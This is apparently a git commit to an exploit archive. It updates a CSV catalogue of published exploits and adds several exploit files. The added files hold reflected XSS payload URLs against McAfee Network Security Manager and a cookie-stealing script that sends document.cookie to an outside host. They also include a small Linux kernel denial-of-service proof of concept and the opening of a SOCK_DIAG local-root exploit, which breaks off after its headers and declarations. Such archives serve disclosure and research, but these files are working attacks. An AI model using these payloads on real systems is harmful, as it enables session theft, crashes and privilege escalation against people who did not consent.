Updated 05_15_2014
This commit is contained in:
parent
3a841992e3
commit
7371706026
23 changed files with 1422 additions and 631 deletions
52
files.csv
52
files.csv
|
@ -3605,7 +3605,7 @@ id,file,description,date,author,platform,type,port
|
|||
3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0
|
||||
3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0
|
||||
3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0
|
||||
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
|
||||
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
|
||||
3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0
|
||||
3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
|
||||
3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
|
||||
|
@ -4945,9 +4945,9 @@ id,file,description,date,author,platform,type,port
|
|||
5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0
|
||||
5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0
|
||||
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
|
||||
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit",2008-03-26,muts,windows,dos,0
|
||||
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
|
||||
5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
|
||||
5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
|
||||
5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
|
||||
|
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
|
|||
5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,S@BUN,php,webapps,0
|
||||
5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0
|
||||
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0
|
||||
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
|
||||
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
|
||||
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
|
||||
5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0
|
||||
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0
|
||||
|
@ -9075,7 +9075,7 @@ id,file,description,date,author,platform,type,port
|
|||
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0
|
||||
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
|
||||
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
|
||||
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
|
||||
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
|
||||
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
|
||||
|
@ -9131,7 +9131,7 @@ id,file,description,date,author,platform,type,port
|
|||
9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0
|
||||
9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0
|
||||
9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0
|
||||
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
|
||||
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0
|
||||
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0
|
||||
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0
|
||||
|
@ -9146,12 +9146,12 @@ id,file,description,date,author,platform,type,port
|
|||
9687,platforms/windows/local/9687.py,"SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 (ping option) Command Injection Vulnerability (auth)",2009-09-15,r00t,hardware,local,0
|
||||
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0
|
||||
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0
|
||||
9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0
|
||||
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0
|
||||
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
|
||||
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0
|
||||
9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
|
@ -9189,7 +9189,7 @@ id,file,description,date,author,platform,type,port
|
|||
9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
|
||||
9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
|
||||
9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
|
||||
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
|
||||
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
|
||||
9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
|
||||
9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
|
||||
9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
|
||||
|
@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
|
|||
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
|
||||
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
|
||||
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
|
||||
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
|
||||
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
|
||||
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
|
@ -10111,7 +10111,7 @@ id,file,description,date,author,platform,type,port
|
|||
10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0
|
||||
10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3V!L,php,webapps,0
|
||||
10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
|
||||
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0
|
||||
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0
|
||||
10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0
|
||||
10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
|
||||
10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
|
||||
|
@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
|
|||
11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0
|
||||
11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0
|
||||
11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21
|
||||
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69
|
||||
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69
|
||||
11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
|
||||
11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
|
||||
11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0
|
||||
|
@ -14130,7 +14130,7 @@ id,file,description,date,author,platform,type,port
|
|||
16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
|
||||
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
|
||||
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
|
||||
16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
|
@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port
|
|||
16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0
|
||||
16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0
|
||||
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
|
||||
|
@ -19700,7 +19700,7 @@ id,file,description,date,author,platform,type,port
|
|||
22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0
|
||||
22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0
|
||||
22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
|
||||
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
|
||||
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
|
||||
22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0
|
||||
22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0
|
||||
22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0
|
||||
|
@ -21680,8 +21680,8 @@ id,file,description,date,author,platform,type,port
|
|||
24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0
|
||||
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
|
||||
24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2 SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
|
||||
24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0
|
||||
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
|
||||
|
@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port
|
|||
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
|
||||
24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
|
||||
24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers - Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
|
||||
24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
|
||||
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
|
||||
|
@ -30035,6 +30035,7 @@ id,file,description,date,author,platform,type,port
|
|||
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
|
||||
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
|
||||
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
|
||||
33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443
|
||||
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
|
||||
|
@ -30049,3 +30050,18 @@ id,file,description,date,author,platform,type,port
|
|||
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
|
||||
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
|
||||
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
|
||||
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
|
||||
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
|
||||
33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0
|
||||
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0
|
||||
33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
|
||||
33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
|
||||
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
12
platforms/jsp/webapps/33346.txt
Executable file
12
platforms/jsp/webapps/33346.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/37003/info
|
||||
|
||||
McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
These issues affect McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
|
||||
|
11
platforms/jsp/webapps/33347.txt
Executable file
11
platforms/jsp/webapps/33347.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/37004/info
|
||||
|
||||
McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism.
|
||||
|
||||
A successful exploit may allow attackers to steal cookie-based authentication credentials; information harvested may aid in further attacks.
|
||||
|
||||
This issue affects McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
|
||||
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
|
||||
4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57
|
13
platforms/linux/dos/33338.c
Executable file
13
platforms/linux/dos/33338.c
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/36953/info
|
||||
|
||||
The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
|
||||
|
||||
Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
|
||||
|
||||
int main()
|
||||
{
|
||||
static long long a[1024 * 1024 * 20] = { 0 };
|
||||
|
||||
return a;
|
||||
|
||||
}
|
164
platforms/linux/local/33336.txt
Executable file
164
platforms/linux/local/33336.txt
Executable file
|
@ -0,0 +1,164 @@
|
|||
/*
|
||||
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
|
||||
* bug found by Spender
|
||||
* poc by SynQ
|
||||
*
|
||||
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
|
||||
* using nl_table->hash.rehash_time, index 81
|
||||
*
|
||||
* Fedora 18 support added
|
||||
*
|
||||
* 2/2013
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <sys/socket.h>
|
||||
#include <linux/netlink.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <errno.h>
|
||||
#include <linux/if.h>
|
||||
#include <linux/filter.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <linux/sock_diag.h>
|
||||
#include <linux/inet_diag.h>
|
||||
#include <linux/unix_diag.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
|
||||
_commit_creds commit_creds;
|
||||
_prepare_kernel_cred prepare_kernel_cred;
|
||||
unsigned long sock_diag_handlers, nl_table;
|
||||
|
||||
